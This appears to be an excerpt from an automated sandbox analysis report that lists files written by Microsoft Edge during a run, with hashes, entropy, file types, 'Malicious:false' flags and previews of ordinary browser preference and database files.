                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:modified
                                Size (bytes):26032
                                Entropy (8bit):6.068092370471732
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXTQ+bCFlWuhuatPo:PMSzMtXijv7hCFlDu6A
                                MD5:52A518AE19743321FB0D485B83A640DC
                                SHA1:B5D9FBCE1714D293E0E715CFF8B69830E3742F7D
                                SHA-256:5EE1B6344189FE0D8F89E83725671DD19D894F4057CDA3C61EA54E1C0DA5090B
                                SHA-512:4104583AF54C36A0BC10D5EE0C76A9CE889ADBBC3B6652536C9D7AD8066DC4DAF566885D638140F2579844C881A05FD127C11D8BD1815FF8F1937AE89E2C4396
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):26032
                                Entropy (8bit):6.068103359563717
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXtu+bCFlWuhuatPo:PMSzMtXijv7pCFlDu6A
                                MD5:B0A0717BB481BC93993F969D84222353
                                SHA1:C1B03FD4E50D2103797908ED07BE7E90F100073E
                                SHA-256:BC05FB2C5DC191F83993225E58F433D07E3CC0774A28EFAD85F24727F01636BC
                                SHA-512:57F2E5BC9A378E20219873EB0F33A61461F84FD45792390C2ADAF671C534A1576BEE95B99FC9129679E9AFF2085DD5361273AC63DD0D07D9FEA3263B92F35CAB
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):8325
                                Entropy (8bit):5.791462919939801
                                Encrypted:false
                                SSDEEP:192:fsNwxMnE7PeiRUYVQck+W+T6qRAq1k8SPxVLZ7VTiQ:fsNwxcEfNqX+d6q3QxVNZTiQ
                                MD5:64DE1385A2A9FFA95907BD847E2CD77A
                                SHA1:25913D92A2E168609A6C420A7113FBC583144715
                                SHA-256:0D066BCCFD7A2DCD8DBFB2071C832ED8AF1EC936C6B8457253EDDA79A832B123
                                SHA-512:0F4E460DA14BAB7F44299B36D4D3E294A4C0C091CDC9D6E9A93271548BCC992A772771BE9B73B9CA54FAAAA998E418B1596682FC7E44899FE92C9C66B6A2E0BD
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:modified
                                Size (bytes):26032
                                Entropy (8bit):6.068103359563717
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXtu+bCFlWuhuatPo:PMSzMtXijv7pCFlDu6A
                                MD5:B0A0717BB481BC93993F969D84222353
                                SHA1:C1B03FD4E50D2103797908ED07BE7E90F100073E
                                SHA-256:BC05FB2C5DC191F83993225E58F433D07E3CC0774A28EFAD85F24727F01636BC
                                SHA-512:57F2E5BC9A378E20219873EB0F33A61461F84FD45792390C2ADAF671C534A1576BEE95B99FC9129679E9AFF2085DD5361273AC63DD0D07D9FEA3263B92F35CAB
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):106332
                                Entropy (8bit):4.638094387502577
                                Encrypted:false
                                SSDEEP:1536:B/lv4EsbMNeQ9s5Vdw34PsiaR+tDvYXridW+8uh57F8:fwrQC5VdwIiS+GdeK57F8
                                MD5:1A1EDD81729021B368E3D80F73A73234
                                SHA1:D64E1F861DAA7FE009E5EED3D53B4FAC585B23F8
                                SHA-256:FD76F4963E14CE6A513CDC4752414256D01C33E1A94E4A880D7587BA4334A267
                                SHA-512:A7833A7BAB78F4C93105CA460CCDED0106FB109C980D41BE3EF633380480816663B189B6859FE7E824C0502607BCDCF0872D22EAE37AED7384B5D65162D34829
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):106332
                                Entropy (8bit):4.638094387502577
                                Encrypted:false
                                SSDEEP:1536:B/lv4EsbMNeQ9s5Vdw34PsiaR+tDvYXridW+8uh57F8:fwrQC5VdwIiS+GdeK57F8
                                MD5:1A1EDD81729021B368E3D80F73A73234
                                SHA1:D64E1F861DAA7FE009E5EED3D53B4FAC585B23F8
                                SHA-256:FD76F4963E14CE6A513CDC4752414256D01C33E1A94E4A880D7587BA4334A267
                                SHA-512:A7833A7BAB78F4C93105CA460CCDED0106FB109C980D41BE3EF633380480816663B189B6859FE7E824C0502607BCDCF0872D22EAE37AED7384B5D65162D34829
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4194304
                                Entropy (8bit):0.04066239492362643
                                Encrypted:false
                                SSDEEP:192:Jr0EbtmqvDtKX7bJEa3XxxTxqZ/g+XA970R6ENShk7NonG1gQMfP0Bn8y08Tcm2D:V0EtYeK8YtbhysCgTPq08T2RGOD
                                MD5:49EC7CA499DCB6452E1141C3F0519E97
                                SHA1:18F80B165B4C65ABA00BB11AB12225AA5404F820
                                SHA-256:FE9FFB9CC80EB857205A622305EE743D28A6D54699B0F8F6027F825334E1D492
                                SHA-512:6E59ED549136EF24FFB5A0DD6C051DE285C685102DDED630EA591C965D96DFAB545656227F70738031729B9009502BCED108F34D483AD64EEBEE55BC3C07C8F4
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4194304
                                Entropy (8bit):0.039790463861696095
                                Encrypted:false
                                SSDEEP:192:5I0EbtmqvD3KYyJEa3Xxx7uqZGXPdg34khtbNEk8NnI1gQM3jo48On8y08Tcm2Rl:u0Etke18BphlXWggzjr08T2RGOD
                                MD5:AB152D53B71DFC48EC7A7926CA4AABA8
                                SHA1:358502604C49844DFFA91664E35720F3A235DD2E
                                SHA-256:C12879A2B9259003986F76C91A270FDE836CFDFE9607F6B72191C3B68464DE5C
                                SHA-512:5AF0DA4C6CF8538E94DDA4829CAB5BD8E7AD42B02FABE66515C2DA57473207CC4875C56E1B3144A4DB5D62044B0157D60A6FD07AD5FF1E77F8C7D0BC58A4B7E7
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):280
                                Entropy (8bit):3.053837919135487
                                Encrypted:false
                                SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1Qllt:o1//BVsJDG2Yqc/
                                MD5:2DE758B44E33AEAF19BAF23B60AA10AD
                                SHA1:CC987BEF7CAFDF20BC38906BA55767454B029A6A
                                SHA-256:6E8D74D84A400AD5C68229CF1458EA52EE75018E74070152DA8A189853FBF2C6
                                SHA-512:6BFC85466FC55782132F38EB3F851FA80434494A2A1607862607065608CE11C2CFA2533C218165F869BC41B5790C6E58F8A8FBCFBFCF59623C3B90436AFD37D0
                                Malicious:false
                                Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):9222
                                Entropy (8bit):5.180212615461894
                                Encrypted:false
                                SSDEEP:96:sVSqlPJ1Ceb9bsYrdvXmc9bkO1LVBXZYYYsY5Th6Cp9/x+6M8muecmAeCPe4zvrI:sVSUJIYrdvtf56YYsYPpj+FVAvUFBf
                                MD5:6E2730A2390482AE09BCF9232E344F9C
                                SHA1:520E894C5EB3A4CEE39F1048D7BC3CC20FAFFFB6
                                SHA-256:0D7FA7E1EC454C5EF7A1FFA44127831D0F3D75A86ADDFA03CB10373ECF717A6D
                                SHA-512:E4FCC27DEA21BC9D4690E02FFB32E2289E5EA9DE6EC6406F7F4369A17FB7071A91ED8DCD8D174C2E792F9996380A9D861B8C4FED164BD3BE88E4DCA865FF7043
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25185
                                Entropy (8bit):5.571248798884802
                                Encrypted:false
                                SSDEEP:768:BSHFsSWPgSfQL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFnfuirwJUpAtuY:BSHFsSWPgSfQLu1jaCfuHJ3tP
                                MD5:4DD26FDB524CEB4E2D6F55896BBB46FF
                                SHA1:06EF12D66C78D0C9F0F8A31C5E9BE7A7955271C7
                                SHA-256:050931C18850E3FC2EFBE142970E4379EF9B4933E55EF0D0D25B1F18BD79A719
                                SHA-512:05291E21B3254C84CBB4B0930B6F46F9B86F450661103850810D8F80C7ECBEDA31BA5F021700DE67B22A180398E54BD2B586F243CD4BA300DAEA4CBD04ABF8FC
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:modified
                                Size (bytes):12733
                                Entropy (8bit):5.349140643885874
                                Encrypted:false
                                SSDEEP:192:uoiOEH/WCxkD7MDPSYAxmemxb7mngJdv9TXJ4MQmLu5/4eeNdl:uzOEOKSXs/J7mGnQmLu5/5eNdl
                                MD5:1E2D51ED04DBBA6051A264F661028C5C
                                SHA1:7422B58C770C07C338FBA2C94CCE126689352873
                                SHA-256:F9716E057E99B46295BBBDEF20C8D6BAEFD2A10AC020B5684990B8CC1D8F2A37
                                SHA-512:629DA522EB383CD1E8E09C4BF23B3D05942289AAD1A76A0023841EADDC8F9FAE9EB156C72303B6EDE52EA1F4187A7F7B39D71003087E455DCF4D6581ABDC0178
                                Malicious:false
                                Preview:...m.................DB_VERSION.1..Z..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13361265764808724.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=Z66hqSRAIxK%2FfuiudWUa9VEzQbPIGUiDfcuGAIlqgPw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-07-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]..A./..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivilegedExperienceID",.. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",.. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",.. "SHOPPING_AUTO_SHOW_BING_SEARCH",.. "SHOPPING_AUTO_SHOW_REBATES",.. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",.. "SHOPPING_AUTO_SHOW_REBATES
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):293
                                Entropy (8bit):5.092389357980106
                                Encrypted:false
                                SSDEEP:6:DIxqGXAs1wkn23oH+Tcwt9Eh1ZB2KLlpIx2+9t+q2Pwkn23oH+Tcwt9Eh1tIFUv:DqALfYeb9Eh1ZFLr4ovYfYeb9Eh16FUv
                                MD5:2AB24FDE025C1D860C9F9D2B182C4D24
                                SHA1:EBED5EE5F60D58A046F4CD8DA4754DEEF97EDCED
                                SHA-256:EDDC41E6471FA0D1067C96D5E3314F415B102654A554116B3DE6911CA29686B3
                                SHA-512:A8147687FADF768017DCFAB9301A626BCE2643613CDE4F39FB1803F67BE16ACED67795F26BE08146BA467530CFC434939F1782AD7F23AEA26EEC8D3798F456F2
                                Malicious:false
                                Preview:2024/05/27-02:42:42.594 2028 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2024/05/27-02:42:43.913 2028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.736218952347586E-4
                                Encrypted:false
                                SSDEEP:3:LsNlG:Ls3G
                                MD5:4BE88D23CEE11C43A3E7BB97BE94EB26
                                SHA1:AFEE8E0214E9CD0564779ED75E5E4A8484D9F917
                                SHA-256:3CC5453DE2E5FFF61155D3584940D104F3D03FC678FC3A605725A152E151C01F
                                SHA-512:BCBB755AC428B651AC2F69B149120356EC1F8FBD6E0862D641F675733FDAE97F86C7B2C5FC4A562AAAB7EA55F02323650A366F2CCC23A033A9E705DBAB705364
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):429
                                Entropy (8bit):5.809210454117189
                                Encrypted:false
                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                Malicious:false
                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):61
                                Entropy (8bit):3.926136109079379
                                Encrypted:false
                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):36864
                                Entropy (8bit):0.555790634850688
                                Encrypted:false
                                SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):203
                                Entropy (8bit):5.4042796420747425
                                Encrypted:false
                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                Malicious:false
                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):203
                                Entropy (8bit):5.4042796420747425
                                Encrypted:false
                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                Malicious:false
                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
